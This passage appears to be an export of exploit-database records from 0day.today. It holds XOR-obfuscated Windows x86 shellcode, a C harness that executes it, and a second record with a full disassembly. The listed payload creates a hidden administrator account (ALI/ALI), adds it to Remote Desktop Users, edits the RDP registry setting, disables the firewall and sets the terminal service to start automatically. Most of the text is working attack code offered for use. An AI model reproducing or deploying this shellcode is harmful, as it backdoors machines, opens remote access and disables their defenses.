d3\\xff\\xd3\\x31\\xc0\\x50\\xb9\\x09\\x4c\\x7c\\x5e\\xba\\x38\\x6c\\x53\\x38\\x31\\xd1\\x51\\xb9\\x42\\x4d\\x39\\x14\\xba\\x62\\x62\\x5d\\x34\\x31\\xd1\\x51\\xb9\\x7a\\x24\\x26\\x75\\xba\\x2d\\x6b\\x74\\x31\\x31\\xd1\\x51\\xb9\\x1d\\x30\\x15\\x28\\xba\\x58\\x77\\x4a\\x6c\\x31\\xd1\\x51\\xb9\\x7c\\x2f\\x57\\x16\\xba\\x53\\x5b\\x77\\x44\\x31\\xd1\\x51\\xb9\\x42\\x25\\x2a\\x66\\xba\\x2d\\x4b\\x59\\x46\\x31\\xd1\\x51\\xb9\\x28\\x2f\\x0c\\x5a\\xba\\x4d\\x4c\\x78\\x33\\x31\\xd1\\x51\\xb9\\x20\\x2b\\x26\\x26\\xba\\x63\\x44\\x48\\x48\\x31\\xd1\\x51\\xb9\\x08\\x2b\\x23\\x67\\xba\\x66\\x52\\x77\\x34\\x31\\xd1\\x51\\xb9\\x49\\x1c\\x2e\\x48\\xba\\x69\\x7a\\x6a\\x2d\\x31\\xd1\\x51\\xb9\\x67\\x67\\x1d\\x37\\xba\\x45\\x47\\x32\\x41\\x31\\xd1\\x51\\xb9\\x03\\x33\\x0d\\x3b\\xba\\x71\\x45\\x68\\x49\\x31\\xd1\\x51\\xb9\\x39\\x6a\\x3c\\x2f\\xba\\x55\\x4a\\x6f\\x4a\\x31\\xd1\\x51\\xb9\\x37\\x44\\x1f\\x2e\\xba\\x5a\\x2d\\x71\\x4f\\x31\\xd1\\x51\\xb9\\x34\\x23\\x23\\x3b\\xba\\x68\\x77\\x46\\x49\\x31\\xd1\\x51\\xb9\\x07\\x3a\\x0a\\x14\\xba\\x73\\x48\\x65\\x78\\x31\\xd1\\x51\\xb9\\x14\\x2e\\x58\\x53\\xba\\x48\\x6d\\x37\\x3d\\x31\\xd1\\x51\\xb9\\x3e\\x3d\\x26\\x32\\xba\\x52\\x6e\\x43\\x46\\x31\\xd1\\x51\\xb9\\x33\\x3c\\x35\\x34\\xba\\x5d\\x48\\x47\\x5b\\x31\\xd1\\x51\\xb9\\x36\\x0e\\x07\\x2b\\xba\\x58\\x7a\\x44\\x44\\x31\\xd1\\x51\\xb9\\x3c\\x10\\x0a\\x37\\xba\\x49\\x62\\x78\\x52\\x31\\xd1\\x51\\xb9\\x24\\x7c\\x3b\\x36\\xba\\x61\\x31\\x67\\x75\\x31\\xd1\\x51\\xb9\\x31\\x3d\\x3b\\x27\\xba\\x62\\x64\\x68\\x73\\x31\\xd1\\x51\\xb9\\x7f\\x7d\\x3d\\x35\\xba\\x36\\x33\\x78\\x69\\x31\\xd1\\x51\\xb9\\x7c\\x13\\x0f\\x2f\\xba\\x31\\x52\\x4c\\x67\\x31\\xd1\\x51\\xb9\\x1b\\x08\\x35\\x2d\\xba\\x58\\x49\\x79\\x72\\x31\\xd1\\x51\\xb9\\x74\\x3a\\x1e\\x21\\xba\\x2d\\x65\\x52\\x6e\\x31\\xd1\\x51\\xb9\\x16\\x10\\x1f\\x17\\xba\\x34\\x58\\x54\\x52\\x31\\xd1\\x51\\xb9\\x2f\\x27\\x0c\\x6e\\xba\\x4e\\x43\\x68\\x4e\\x31\\xd1\\x51\\xb9\\x39\\x22\\x5e\\x50\\xba\\x4b\\x47\\x39\\x70\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xdc\\x7a\\xa8\\x23\\xba\\x4d\\x56\\x36\\x55\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\xb8\\x41\\x41\\x41\\x65\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x1e\\x53\\x39\\x3c\\xba\\x6d\\x32\\x5b\\x50\\x31\\xd1\\x51\\xb9\\x04\\x66\\x2f\\x32\\xba\\x61\\x46\\x4b\\x5b\\x31\\xd1\\x51\\xb9\\x19\\x1e\\x0d\\x11\\xba\\x69\\x73\\x62\\x75\\x31\\xd1\\x51\\xb9\\x20\\x41\\x47\\x36\\xba\\x45\\x35\\x67\\x59\\x31\\xd1\\x51\\xb9\\x2b\\x05\\x64\\x2a\\xba\\x47\\x69\\x44\\x59\\x31\\xd1\\x51\\xb9\\x10\\x3f\\x4f\\x22\\xba\\x62\\x5a\\x38\\x43\\x31\\xd1\\x51\\xb9\\x2a\\x6f\\x2a\\x24\\xba\\x42\\x4f\\x4c\\x4d\\x31\\xd1\\x51\\xb9\\x29\\x09\\x1e\\x5e\\xba\\x47\\x6c\\x6a\\x2d\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xdc\\x7a\\xa8\\x23\\xba\\x4d\\x56\\x36\\x55\\x31\\xd3\\xff\\xd3\\x31\\xc0\\x50\\xb8\\x41\\x41\\x41\\x6f\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\xc1\\xe8\\x08\\x50\\xb9\\x72\\x2a\\x05\\x39\\xba\\x52\\x4b\\x70\\x4d\\x31\\xd1\\x51\\xb9\\x54\\x3a\\x05\\x52\\xba\\x35\\x48\\x71\\x6f\\x31\\xd1\\x51\\xb9\\x29\\x16\\x0a\\x47\\xba\\x4c\\x36\\x79\\x33\\x31\\xd1\\x51\\xb9\\x27\\x1b\\x5b\\x3e\\xba\\x55\\x6d\\x32\\x5d\\x31\\xd1\\x51\\xb9\\x33\\x1a\\x3b\\x10\\xba\\x41\\x77\\x48\\x75\\x31\\xd1\\x51\\xb9\\x34\\x79\\x3a\\x12\\xba\\x53\\x59\\x4e\\x77\\x31\\xd1\\x51\\xb9\\x1d\\x5c\\x1e\\x28\\xba\\x72\\x32\\x78\\x41\\x31\\xd1\\x51\\xb9\\x2a\\x4e\\x5a\\x28\\xba\\x59\\x2d\\x7a\\x4b\\x31\\xd1\\x51\\x89\\xe0\\xbb\\x41\\x41\\x41\\x01\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\xc1\\xeb\\x08\\x53\\x50\\xbb\\xdc\\x7a\\xa8\\x23\\xba\\x4d\\x56\\x36\\x55\\x31\\xd3\\xff\\xd3\\xbb\\x9b\\x4f\\xd0\\x30\\xba\\x63\\x36\\x46\\x46\\x31\\xd3\\xff\\xd3\";\r\nfprintf(stdout,\"Length: %d\\n\\n\",strlen(shellcode));\r\n (*(void(*)()) shellcode)();\r\n}\r\n\r\n\r\n\r\n\r\n\n\n# 0day.today [2016-04-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "http://0day.today/exploit/23125", "hash": "cd5fb5b14f5dadf0b8a63e7e56207abddf018729825d1e7683c12dfc475523c2"}, {"lastseen": "2016-04-20T02:21:49", "references": [], "description": "#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]\r#length: 1218 bytes\r#Date: 13 January 2015\r#Author: Ali Razmjoo\r#tested On: Windows 7 x86 ultimate\r WinExec => 0x7666e695\rExitProcess => 0x76632acf\r====================================\rExecute :\rnet user ALI ALI /add\rnet localgroup Administrators ALI /add\rNET LOCALGROUP \"Remote Desktop Users\" ALI /add \rreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f \rnetsh firewall set opmode disable\rsc config termservice start= auto\r====================================\r", "edition": 1, "reporter": "Ali Razmjoo", "published": "2015-01-15T00:00:00", "type": "zdt", "title": "win32/7 x86 ultimate Add Admin ALI/ALI & Enable RDP Obfuscated Shellcode - 1218 bytes", "objectVersion": "1.0", "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-15T00:00:00", "href": "http://0day.today/exploit/description/23124", "id": "1337DAY-ID-23124", "sourceData": "/*\r\n#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]\r\n#length: 1218 bytes\r\n#Date: 13 January 2015\r\n#Author: Ali Razmjoo\r\n#tested On: Windows 7 x86 ultimate\r\n\r\nWinExec => 0x7666e695\r\nExitProcess => 0x76632acf\r\n====================================\r\nExecute :\r\nnet user ALI ALI /add\r\nnet localgroup Administrators ALI /add\r\nNET LOCALGROUP \"Remote Desktop Users\" ALI /add \r\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f \r\nnetsh firewall set opmode disable\r\nsc config termservice start= auto\r\n====================================\r\n\r\n\r\n\r\nAli Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com']\r\n\r\nThanks to my friends , Dariush Nasirpour and Ehsan Nezami\r\n\r\n\r\nC:\\Users\\Ali\\Desktop>objdump -D shellcode.o\r\n\r\nshellcode.o: file format elf32-i386\r\n\r\n\r\nDisassembly of section .text:\r\n\r\n00000000 <.text>:\r\n 0: 31 c0 xor %eax,%eax\r\n 2: 50 push %eax\r\n 3: b8 41 41 41 64 mov $0x64414141,%eax\r\n 8: c1 e8 08 shr $0x8,%eax\r\n b: c1 e8 08 shr $0x8,%eax\r\n e: c1 e8 08 shr $0x8,%eax\r\n 11: 50 push %eax\r\n 12: b9 6d 76 53 52 mov $0x5253766d,%ecx\r\n 17: ba 4d 59 32 36 mov $0x3632594d,%edx\r\n 1c: 31 d1 xor %edx,%ecx\r\n 1e: 51 push %ecx\r\n 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx\r\n 24: ba 4e 33 2d 38 mov $0x382d334e,%edx\r\n 29: 31 d1 xor %edx,%ecx\r\n 2b: 51 push %ecx\r\n 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx\r\n 31: ba 4c 34 34 31 mov $0x3134344c,%edx\r\n 36: 31 d1 xor %edx,%ecx\r\n 38: 51 push %ecx\r\n 39: b9 46 47 57 46 mov $0x46574746,%ecx\r\n 3e: ba 33 34 32 34 mov $0x34323433,%edx\r\n 43: 31 d1 xor %edx,%ecx\r\n 45: 51 push %ecx\r\n 46: b9 56 50 47 64 mov $0x64475056,%ecx\r\n 4b: ba 38 35 33 44 mov $0x44333538,%edx\r\n 50: 31 d1 xor %edx,%ecx\r\n 52: 51 push %ecx\r\n 53: 89 e0 mov %esp,%eax\r\n 55: bb 41 41 41 01 mov $0x1414141,%ebx\r\n 5a: c1 eb 08 shr $0x8,%ebx\r\n 5d: c1 eb 08 shr $0x8,%ebx\r\n 60: c1 eb 08 shr $0x8,%ebx\r\n 63: 53 push %ebx\r\n 64: 50 push %eax\r\n 65: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx\r\n 6a: ba 33 52 64 59 mov $0x59645233,%edx\r\n 6f: 31 d3 xor %edx,%ebx\r\n 71: ff d3 call *%ebx\r\n 73: 31 c0 xor %eax,%eax\r\n 75: 50 push %eax\r\n 76: 68 41 41 64 64 push $0x64644141\r\n 7b: 58 pop %eax\r\n 7c: c1 e8 08 shr $0x8,%eax\r\n 7f: c1 e8 08 shr $0x8,%eax\r\n 82: 50 push %eax\r\n 83: b9 01 41 60 32 mov $0x32604101,%ecx\r\n 88: ba 48 61 4f 53 mov $0x534f6148,%edx\r\n 8d: 31 d1 xor %edx,%ecx\r\n 8f: 51 push %ecx\r\n 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx\r\n 95: ba 5b 67 4c 63 mov $0x634c675b,%edx\r\n 9a: 31 d1 xor %edx,%ecx\r\n 9c: 51 push %ecx\r\n 9d: b9 03 24 36 21 mov $0x21362403,%ecx\r\n a2: ba 62 50 59 53 mov $0x53595062,%edx\r\n a7: 31 d1 xor %edx,%ecx\r\n a9: 51 push %ecx\r\n aa: b9 34 41 15 18 mov $0x18154134,%ecx\r\n af: ba 5d 32 61 6a mov $0x6a61325d,%edx\r\n b4: 31 d1 xor %edx,%ecx\r\n b6: 51 push %ecx\r\n b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx\r\n bc: ba 68 68 72 4b mov $0x4b726868,%edx\r\n c1: 31 d1 xor %edx,%ecx\r\n c3: 51 push %ecx\r\n c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx\r\n c9: ba 5a 57 5b 52 mov $0x525b575a,%edx\r\n ce: 31 d1 xor %edx,%ecx\r\n d0: 51 push %ecx\r\n d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx\r\n d6: ba 70 4b 70 51 mov $0x51704b70,%edx\r\n db: 31 d1 xor %edx,%ecx\r\n dd: 51 push %ecx\r\n de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx\r\n e3: ba 51 45 51 2d mov $0x2d514551,%edx\r\n e8: 31 d1 xor %edx,%ecx\r\n ea: 51 push %ecx\r\n eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx\r\n f0: ba 4d 39 68 39 mov $0x3968394d,%edx\r\n f5: 31 d1 xor %edx,%ecx\r\n f7: 51 push %ecx\r\n f8: 89 e0 mov %esp,%eax\r\n fa: bb 41 41 41 01 mov $0x1414141,%ebx\r\n ff: c1 eb 08 shr $0x8,%ebx\r\n 102: c1 eb 08 shr $0x8,%ebx\r\n 105: c1 eb 08 shr $0x8,%ebx\r\n 108: 53 push %ebx\r\n 109: 50 push %eax\r\n 10a: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx\r\n 10f: ba 33 52 64 59 mov $0x59645233,%edx\r\n 114: 31 d3 xor %edx,%ebx\r\n 116: ff d3 call *%ebx\r\n 118: 31 c0 xor %eax,%eax\r\n 11a: 50 push %eax\r\n 11b: 68 41 41 64 64 push $0x64644141\r\n 120: 58 pop %eax\r\n 121: c1 e8 08 shr $0x8,%eax\r\n 124: c1 e8 08 shr $0x8,%eax\r\n 127: 50 push %eax\r\n 128: b9 02 63 6b 35 mov $0x356b6302,%ecx\r\n 12d: ba 4b 43 44 54 mov $0x5444434b,%edx\r\n 132: 31 d1 xor %edx,%ecx\r\n 134: 51 push %ecx\r\n 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx\r\n 13a: ba 43 75 2d 71 mov $0x712d7543,%edx\r\n 13f: 31 d1 xor %edx,%ecx\r\n 141: 51 push %ecx\r\n 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx\r\n 147: ba 54 5a 49 69 mov $0x69495a54,%edx\r\n 14c: 31 d1 xor %edx,%ecx\r\n 14e: 51 push %ecx\r\n 14f: b9 25 34 12 67 mov $0x67123425,%ecx\r\n 154: ba 4a 44 32 32 mov $0x3232444a,%edx\r\n 159: 31 d1 xor %edx,%ecx\r\n 15b: 51 push %ecx\r\n 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx\r\n 161: ba 6e 71 74 6d mov $0x6d74716e,%edx\r\n 166: 31 d1 xor %edx,%ecx\r\n 168: 51 push %ecx\r\n 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx\r\n 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx\r\n 173: 31 d1 xor %edx,%ecx\r\n 175: 51 push %ecx\r\n 176: b9 35 15 03 2a mov $0x2a031535,%ecx\r\n 17b: ba 67 70 6e 45 mov $0x456e7067,%edx\r\n 180: 31 d1 xor %edx,%ecx\r\n 182: 51 push %ecx\r\n 183: b9 3a 17 75 46 mov $0x4675173a,%ecx\r\n 188: ba 6f 47 55 64 mov $0x6455476f,%edx\r\n 18d: 31 d1 xor %edx,%ecx\r\n 18f: 51 push %ecx\r\n 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx\r\n 195: ba 6a 72 59 51 mov $0x5159726a,%edx\r\n 19a: 31 d1 xor %edx,%ecx\r\n 19c: 51 push %ecx\r\n 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx\r\n 1a2: ba 66 65 45 6b mov $0x6b456566,%edx\r\n 1a7: 31 d1 xor %edx,%ecx\r\n 1a9: 51 push %ecx\r\n 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx\r\n 1af: ba 53 65 61 7a mov $0x7a616553,%edx\r\n 1b4: 31 d1 xor %edx,%ecx\r\n 1b6: 51 push %ecx\r\n 1b7: 89 e0 mov %esp,%eax\r\n 1b9: bb 41 41 41 01 mov $0x1414141,%ebx\r\n 1be: c1 eb 08 shr $0x8,%ebx\r\n 1c1: c1 eb 08 shr $0x8,%ebx\r\n 1c4: c1 eb 08 shr $0x8,%ebx\r\n 1c7: 53 push %ebx\r\n 1c8: 50 push %eax\r\n 1c9: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx\r\n 1ce: ba 33 52 64 59 mov $0x59645233,%edx\r\n 1d3: 31 d3 xor %edx,%ebx\r\n 1d5: ff d3 call *%ebx\r\n 1d7: 31 c0 xor %eax,%eax\r\n 1d9: 50 push %eax\r\n 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx\r\n 1df: ba 38 6c 53 38 mov $0x38536c38,%edx\r\n 1e4: 31 d1 xor %edx,%ecx\r\n 1e6: 51 push %ecx\r\n 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx\r\n 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx\r\n 1f1: 31 d1 xor %edx,%ecx\r\n 1f3: 51 push %ecx\r\n 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx\r\n 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx\r\n 1fe: 31 d1 xor %edx,%ecx\r\n 200: 51 push %ecx\r\n 201: b9 1d 30 15 28 mov $0x2815301d,%ecx\r\n 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx\r\n 20b: 31 d1 xor %edx,%ecx\r\n 20d: 51 push %ecx\r\n 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx\r\n 213: ba 53 5b 77 44 mov $0x44775b53,%edx\r\n 218: 31 d1 xor %edx,%ecx\r\n 21a: 51 push %ecx\r\n 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx\r\n 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx\r\n 225: 31 d1 xor %edx,%ecx\r\n 227: 51 push %ecx\r\n 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx\r\n 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx\r\n 232: 31 d1 xor %edx,%ecx\r\n 234: 51 push %ecx\r\n 235: b9 20 2b 26 26 mov $0x26262b20,%ecx\r\n 23a: ba 63 44 48 48 mov $0x48484463,%edx\r\n 23f: 31 d1 xor %edx,%ecx\r\n 241: 51 push %ecx\r\n 242: b9 08 2b 23 67 mov $0x67232b08,%ecx\r\n 247: ba 66 52 77 34 mov $0x34775266,%edx\r\n 24c: 31 d1 xor %edx,%ecx\r\n 24e: 51 push %ecx\r\n 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx\r\n 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx\r\n 259: 31 d1 xor %edx,%ecx\r\n 25b: 51 push %ecx\r\n 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx\r\n 261: ba 45 47 32 41 mov $0x41324745,%edx\r\n 266: 31 d1 xor %edx,%ecx\r\n 268: 51 push %ecx\r\n 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx\r\n 26e: ba 71 45 68 49 mov $0x49684571,%edx\r\n 273: 31 d1 xor %edx,%ecx\r\n 275: 51 push %ecx\r\n 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx\r\n 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx\r\n 280: 31 d1 xor %edx,%ecx\r\n 282: 51 push %ecx\r\n 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx\r\n 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx\r\n 28d: 31 d1 xor %edx,%ecx\r\n 28f: 51 push %ecx\r\n 290: b9 34 23 23 3b mov $0x3b232334,%ecx\r\n 295: ba 68 77 46 49 mov $0x49467768,%edx\r\n 29a: 31 d1 xor %edx,%ecx\r\n 29c: 51 push %ecx\r\n 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx\r\n 2a2: ba 73 48 65 78 mov $0x78654873,%edx\r\n 2a7: 31 d1 xor %edx,%ecx\r\n 2a9: 51 push %ecx\r\n 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx\r\n 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx\r\n 2b4: 31 d1 xor %edx,%ecx\r\n 2b6: 51 push %ecx\r\n 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx\r\n 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx\r\n 2c1: 31 d1 xor %edx,%ecx\r\n 2c3: 51 push %ecx\r\n 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx\r\n 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx\r\n 2ce: 31 d1 xor %edx,%ecx\r\n 2d0: 51 push %ecx\r\n 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx\r\n 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx\r\n 2db: 31 d1 xor %edx,%ecx\r\n 2dd: 51 push %ecx\r\n 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx\r\n 2e3: ba 49 62 78 52 mov $0x52786249,%edx\r\n 2e8: 31 d1 xor %edx,%ecx\r\n 2ea: 51 push %ecx\r\n 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx\r\n 2f0: ba 61 31 67 75 mov $0x75673161,%edx\r\n 2f5: 31 d1 xor %edx,%ecx\r\n 2f7: 51 push %ecx\r\n 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx\r\n 2fd: ba 62 64 68 73 mov $0x73686462,%edx\r\n 302: 31 d1 xor %edx,%ecx\r\n 304: 51 push %ecx\r\n 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx\r\n 30a: ba 36 33 78 69 mov $0x69783336,%edx\r\n 30f: 31 d1 xor %edx,%ecx\r\n 311: 51 push %ecx\r\n 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx\r\n 317: ba 31 52 4c 67 mov $0x674c5231,%edx\r\n 31c: 31 d1 xor %edx,%ecx\r\n 31e: 51 push %ecx\r\n 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx\r\n 324: ba 58 49 79 72 mov $0x72794958,%edx\r\n 329: 31 d1 xor %edx,%ecx\r\n 32b: 51 push %ecx\r\n 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx\r\n 331: ba 2d 65 52 6e mov $0x6e52652d,%edx\r\n 336: 31 d1 xor %edx,%ecx\r\n 338: 51 push %ecx\r\n 339: b9 16 10 1f 17 mov $0x171f1016,%ecx\r\n 33e: ba 34 58 54 52 mov $0x52545834,%edx\r\n 343: 31 d1 xor %edx,%ecx\r\n 345: 51 push %ecx\r\n 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx\r\n 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx\r\n 350: 31 d1 xor %edx,%ecx\r\n 352: 51 push %ecx\r\n 353: b9 39 22 5e 50 mov $0x505e2239,%ecx\r\n 358: ba 4b 47 39 70 mov $0x7039474b,%edx\r\n 35d: 31 d1 xor %edx,%ecx\r\n 35f: 51 push %ecx\r\n 360: 89 e0 mov %esp,%eax\r\n 362: bb 41 41 41 01 mov $0x1414141,%ebx\r\n 367: c1 eb 08 shr $0x8,%ebx\r\n 36a: c1 eb 08 shr $0x8,%ebx\r\n 36d: c1 eb 08 shr $0x8,%ebx\r\n 370: 53 push %ebx\r\n 371: 50 push %eax\r\n 372: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx\r\n 377: ba 33 52 64 59 mov $0x59645233,%edx\r\n 37c: 31 d3 xor %edx,%ebx\r\n 37e: ff d3 call *%ebx\r\n 380: 31 c0 xor %eax,%eax\r\n 382: 50 push %eax\r\n 383: b8 41 41 41 65 mov $0x65414141,%eax\r\n 388: c1 e8 08 shr $0x8,%eax\r\n 38b: c1 e8 08 shr $0x8,%eax\r\n 38e: c1 e8 08 shr $0x8,%eax\r\n 391: 50 push %eax\r\n 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx\r\n 397: ba 6d 32 5b 50 mov $0x505b326d,%edx\r\n 39c: 31 d1 xor %edx,%ecx\r\n 39e: 51 push %ecx\r\n 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx\r\n 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx\r\n 3a9: 31 d1 xor %edx,%ecx\r\n 3ab: 51 push %ecx\r\n 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx\r\n 3b1: ba 69 73 62 75 mov $0x75627369,%edx\r\n 3b6: 31 d1 xor %edx,%ecx\r\n 3b8: 51 push %ecx\r\n 3b9: b9 20 41 47 36 mov $0x36474120,%ecx\r\n 3be: ba 45 35 67 59 mov $0x59673545,%edx\r\n 3c3: 31 d1 xor %edx,%ecx\r\n 3c5: 51 push %ecx\r\n 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx\r\n 3cb: ba 47 69 44 59 mov $0x59446947,%edx\r\n 3d0: 31 d1 xor %edx,%ecx\r\n 3d2: 51 push %ecx\r\n 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx\r\n 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx\r\n 3dd: 31 d1 xor %edx,%ecx\r\n 3df: 51 push %ecx\r\n 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx\r\n 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx\r\n 3ea: 31 d1 xor %edx,%ecx\r\n 3ec: 51 push %ecx\r\n 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx\r\n 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx\r\n 3f7: 31 d1 xor %edx,%ecx\r\n 3f9: 51 push %ecx\r\n 3fa: 89 e0 mov %esp,%eax\r\n 3fc: bb 41 41 41 01 mov $0x1414141,%ebx\r\n 401: c1 eb 08 shr $0x8,%ebx\r\n 404: c1 eb 08 shr $0x8,%ebx\r\n 407: c1 eb 08 shr $0x8,%ebx\r\n 40a: 53 push %ebx\r\n 40b: 50 push %eax\r\n 40c: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx\r\n 411: ba 33 52 64 59 mov $0x59645233,%edx\r\n 416: 31 d3 xor %edx,%ebx\r\n 418: ff d3 call *%ebx\r\n 41a: 31 c0 xor %eax,%eax\r\n 41c: 50 push %eax\r\n 41d: b8 41 41 41 6f mov $0x6f414141,%eax\r\n 422: c1 e8 08 shr $0x8,%eax\r\n 425: c1 e8 08 shr $0x8,%eax\r\n 428: c1 e8 08 shr $0x8,%eax\r\n 42b: 50 push %eax\r\n 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx\r\n 431: ba 52 4b 70 4d mov $0x4d704b52,%edx\r\n 436: 31 d1 xor %edx,%ecx\r\n 438: 51 push %ecx\r\n 439: b9 54 3a 05 52 mov $0x52053a54,%ecx\r\n 43e: ba 35 48 71 6f mov $0x6f714835,%edx\r\n 443: 31 d1 xor %edx,%ecx\r\n 445: 51 push %ecx\r\n 446: b9 29 16 0a 47 mov $0x470a1629,%ecx\r\n 44b: ba 4c 36 79 33 mov $0x3379364c,%edx\r\n 450: 31 d1 xor %edx,%ecx\r\n 452: 51 push %ecx\r\n 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx\r\n 458: ba 55 6d 32 5d mov $0x5d326d55,%edx\r\n 45d: 31 d1 xor %edx,%ecx\r\n 45f: 51 push %ecx\r\n 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx\r\n 465: ba 41 77 48 75 mov $0x75487741,%edx\r\n 46a: 31 d1 xor %edx,%ecx\r\n 46c: 51 push %ecx\r\n 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx\r\n 472: ba 53 59 4e 77 mov $0x774e5953,%edx\r\n 477: 31 d1 xor %edx,%ecx\r\n 479: 51 push %ecx\r\n 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx\r\n 47f: ba 72 32 78 41 mov $0x41783272,%edx\r\n 484: 31 d1 xor %edx,%ecx\r\n 486: 51 push %ecx\r\n 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx\r\n 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx\r\n 491: 31 d1 xor %edx,%ecx\r\n 493: 51 push %ecx\r\n 494: 89 e0 mov %esp,%eax\r\n 496: bb 41 41 41 01 mov $0x1414141,%ebx\r\n 49b: c1 eb 08 shr $0x8,%ebx\r\n 49e: c1 eb 08 shr $0x8,%ebx\r\n 4a1: c1 eb 08 shr $0x8,%ebx\r\n 4a4: 53 push %ebx\r\n 4a5: 50 push %eax\r\n 4a6: bb a6 b4 02 2f mov $0x2f02b4a6,%ebx\r\n 4ab: ba 33 52 64 59 mov $0x59645233,%edx\r\n 4b0: 31 d3 xor %edx,%ebx\r\n 4b2: ff d3 call *%ebx\r\n 4b4: bb f9 7e 5e 22 mov $0x225e7ef9,%ebx\r\n 4b9: ba 36 54 3d 54 mov $0x543d5436,%edx\r\n 4be: 31 d3 xor %edx,%ebx\r\n 4c0: ff d3 call *%ebx\r\n \r\n \r\n*/\r\n \r\n#include <stdio.h>\r\n#include <string.h>\r\n \r\nint main(){\r\nunsigned char shellcode[]= 